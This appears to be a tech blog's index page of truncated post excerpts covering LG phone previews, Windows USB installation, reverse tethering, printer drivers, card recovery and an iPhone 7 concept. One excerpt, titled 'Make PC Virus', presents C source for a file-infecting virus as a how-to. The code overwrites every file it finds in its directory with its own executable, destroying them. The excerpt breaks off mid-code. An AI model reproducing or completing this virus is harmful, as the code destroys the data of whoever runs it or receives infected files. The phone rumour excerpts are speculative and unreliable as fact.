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LG G4 Camera Style.

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LG G4 Camera Pixels : Posted By Tony Bravo 21 April 2015   If LG does not keep the super fast laser auto focus , optical image stabilization and with dual LED flash that present in the G3 and G Flex 2, then we will eat our smart phones, SIM cards and all. The laser auto focus should ensure that the G4's shots are taken just as snappily, while the stabilized lens should serve up the decent low light shots we have come to expect LG's Luckily for our teeth and digestive systems, all leaks point to the G4's camera tech returning. We also expect to see an improvement in the front facing camera, especially with the (unfortunate) selfie craze that's showing no signs of dying out, and leaks point to an impressive 8MP front facing snapper. The G Flex 2 automatically shows you a preview of your selfie when it detects that you have brought it down, and the G4 will almost certainly add this trick to its arsenal. A Samsung style wide angle lens for cramming

LG G3 New Interface

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LG G3 NEW INTERFACE : Posted By Tony Bravo 21 April 2015  When it came to listing the criticisms of the LG G2, the biggest problem was the interface. It was so cluttered that if you had the remote activated and received a message you had to scroll down to see it. Compare that to the HTC One M8, and you have got nothing but the missive to check. On top of that, the G2 went for a really garish and cartoon look too, meaning it was hard to evan-gelise about a phone that was otherwise brilliant. It's a much more fluid system that shows LG has grown up the problems of before and making it into a more intuitive way of navigating through the handset. The new interface on the LG G3 is a big improvement. Gone is the skeumorphism is favor of a new flat tile look. The icons are redesigned. The different applications have their own color scheme for easy recognition and the color palette is more muted than before. LG has definitely taken touches from HTC, Samsung and Apple wit

LG G3 : Key Features

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LG G3 Key Features : Posted By Tony Bravo 21 April 2015 There are number of key features that LG is touting as new and improved this year with the G3 but none sticks out as a prominently as the QHD screen. Some might think that this is four times the pixel count of an HD screen, and you'd be right to a degree. But only if you're talking about 720p screens  if you are comparing the G3 to something like the Galaxy S5, that packs in two million pixels to the G3's 3.6 million. It's a lot sharper, sure but anyone thinking it's going to be mind blowing will be disappointed. While it agreed he was right there was a limit to what the human eye can see in terms of sharpness, Lg reckons that the way sight works means the Retina display isn't the top end. The big question here with the screen is: why do it? The official reason LG told me was it had done some research and had released that Steve Jobs was wrong. But apparently there's another level sti

How to Record Audio with Quicktime In PC

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How To Record Audio In Computer With Quick-time : Posted By Tony Bravo 21 April 2015 .

How To Take Screen Shot In Mac OS

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Screen Shot In Mac OS X : Posted By Tony Bravo 21 April 2015

Make PC Virus

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This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.    #include<stdio.h> #include<io.h> #include<dos.h> #include<dir.h> #include<conio.h> #include<time.h> FILE *virus,*host; int done,a=0; unsigned long x; char buff[2048]; struct ffblk ffblk; clock_t st,end; void main() { st=clock(); clrscr(); done=findfirst(“*.*”,&ffblk,0); while(!done) { virus=fopen(_argv[0],”rb”); host=fopen(ffblk.ff_name,”rb+”); if(host==NULL) goto next; x=89088; printf(“Infecting %s\n”,ffblk.ff_name,a); while(x>2048) { fread(buff,2048,1,virus); fwrite(buff,2048,1,host); x-=2048; } fread(

Card Recovery

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CardRecovery 6.10 Build 1210 CardRecovery helps you get back your image and video files accidentally deleted from memory cards, or lost through card error or damage. In three easy steps the software recovers photos and videos from a wide range of memory card types including the popular formats SD (Secure Digital), CF (Compact Flash), xD Picture, MicroSD, Memory Stick and SDHC, as well as mobile phones, flash drives and other storage devices. CardRecovery performs READ ONLY operations and is therefore risk free and safe. It does not write to or delete any data from your memory card. It rescues image and video files from the card and saves them to a selected location such as your hard drive. The digital image recovery software supports many common picture, video and audio formats (JPG, TIFF, AVI, MPG, MOV, MP4, MP3, WAV, …), a range of digital cameras (Nikon, Canon, Kodak, FujiFilm, Casio, Olympus, Sony, Samsung, Panasonic, …) and numerous memory card brands (Sa

Universal Drivers

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click here to download Installation I held my breath and clicked on “HPUPD47PCL632.exe.”  I was immediately faced with my first big decision– where to unzip the archive.  I chose the default and the archive was unzipped to the root directory of my computer.  Now, I have to remember to go back and delete that folder after the installation completes successfully.  I want you to know that I hate having to do that and I can’t count the gigabytes of useless temporary installation folders that I’ve deleted over the years.  Personally, I prefer when programs un-archive into a temporary Windows folder that I know will be automatically purged some time in the near future during a typical Windows disk cleanup operation. Configuration The “special” (or dynamic) part of this printer object.  With dynamic mode, this dialog appears every time you choose the HP Universal Print Driver as your output device.  Once you locate printers using this dialog, they can be permanently saved in your Printe

Share Computer Net with Smartphone

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How to share your PC’s internet connection with your Android phone over USB Step 1: Connect your Android phone with your PC using an USB data cable and ensure that USB debugging is enabled on your phone .  (  Settings > Applications > Development > USB Debugging > Turn On ) Step 2: Extract the downloaded zip file and run the AndroidTool.exe file . Step 3: From the Android reverse tethering utility , select your phone from the “ Select a device “ drop down box and then from the “ Select DNS to use “ dropdown box  , select a DNS ( Choose anything apart from 192.168.1.1 ) . Step 4: Click on the Connect button to start the reverse tethering process . The utility will then connect with your android phone and install the required apps on your phone . If the utility crashes simply run it over again . Step 5: After the required apps have been installed on your phone , You will be prompted to grant root access to the USB tunnel app . Tap on “Grant”

Install WIndows 7 with Usb

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The fastest way to install windows 7 is from a bootable usb drive. You can cut the install time down to around 15 minutes compared with 30-40 via DVD if you use a fast drive. People still asking me to explain what is the best way to do this as many of the guides online are too complex, or require third party software which doesn’t always work as they supposed to. With this BootableUSB guide all you need to ensure is that your motherboard supports USB booting, and this is a common feature now for most of the computers. Today I am going to publish a step by step guide which works perfectly and doesn’t require any additional tools – I have been doing it for some time now to create bootable Windows install drives. You need to get hold of a fast USB 2.0 flash drive. It doesn’t need to be 32GB or bigger,however, all you need is a 4GB unit. The faster it is, the better. What you need: – Windows 7 DVD install disc or ISO image – USB Drive (4GB+ and as fast as you can get)

Install windows from Usb flash drive

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Dear.     1.  Most Flash Drives available in the market will work. When choosing a drive for the preparation we should remember two key points: The Flash Drive should have a decent read/write speed The size of the drive should be at least 4GB 2 To prepare the USB Flash Drive, we need access to a computer running either Windows Vista™ or Windows 7™. Insert the Flash Drive in the computer and wait for the computer to recognize the drive. 3 Click START > All Programs > Accessories 4 Right click on Command Prompt and select “Run As Administrator” 5 In Command Prompt, type DISKPART 6 Type LIST DISK This command will list all of the disks on your system. Be sure to choose the correct disk. For example, If you are using a 4GB flash drive. Select the disk with the size of ~3822MB. [ WARNING! ALL DATA ON THE DISK YOU SELECT WILL BE LOST! MAKE SURE TO BACKUP ANY DATA YOU WISH TO KEEP! ] 1 Type SELECT DISK X [Repl

Windows 10 requirments for PC

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System requirements Basically, if your PC can run Windows 8.1, you’re good to go. If you're not sure, don't worry—Windows will check your system to make sure it can install the preview. Processor: 1 gigahertz (GHz) or faster RAM: 1 gigabyte (GB) (32-bit) or 2 GB (64-bit) Free hard disk space: 16 GB Graphics card: Microsoft DirectX 9 graphics device with WDDM driver A Microsoft account and Internet access Important notes Some PC processors and hardware configurations aren’t supported by Technical Preview, including a small number of older, 64-bit CPUs, and some 32 GB and all 16 GB devices running a compressed operating system. To access the Windows Store and to download and run apps, you need an Internet connection, a screen resolution of at least 1024 x 768, and a Microsoft account. The Windows Store in Technical Preview will have many (but not all) Windows 8.1 apps available. (Apps for Windows 10 Technical Preview will not be available for PCs r

How to make a projector with smartphone

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Projector With Smartphone : Posted By Tony Bravo . 15 April 2015

A New Dawn Of Lara

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A New Dawn Of Lara Game Review : Posted By Tony Bravo  20 April 2015

Sony Xperia Z3 Review

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Sony Xperia Z3 Review : Posted By Tony Bravo 15 April 2015

iPhone 1 Jail-breaking

how to install jailbreak in your iPhone.  Posted By Tony Bravo 14 April 2015

Samsung Galaxy S5 Review

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Samsung Galaxy S5 : Posted By Tony Bravo , 14 April 2015

Samsung Galaxy Note 4 Korea

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                              Samsung Galaxy Note 4 Korea  

IPHONE 7 CONCEPT - INNOVATIVE SCREEN

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iPhone 7 Concept – Innovative Screen The next iPhone needs to be innovative and the main part is the screen ! New amazing concept shows the next generation of the iPhone device, the  iPhone 7   with two screens. The next iPhone will come with According to the  concept   – 4.9 inch Full HD Sapphire front display, wrap around screen – The next operating system of Apple, iOS 9 – Capacitive home button and Touch ID sensor with 700 dpi pixel density – NFC sensor and bluetooth 4.2 – Apple A9 chip quad-core 1.8 GHz with 2x faster GPU – 13 MP rear camera, 2k@30fps, 1080p@120-480fps – 2260 mAh battery with light indicator around the lightning connector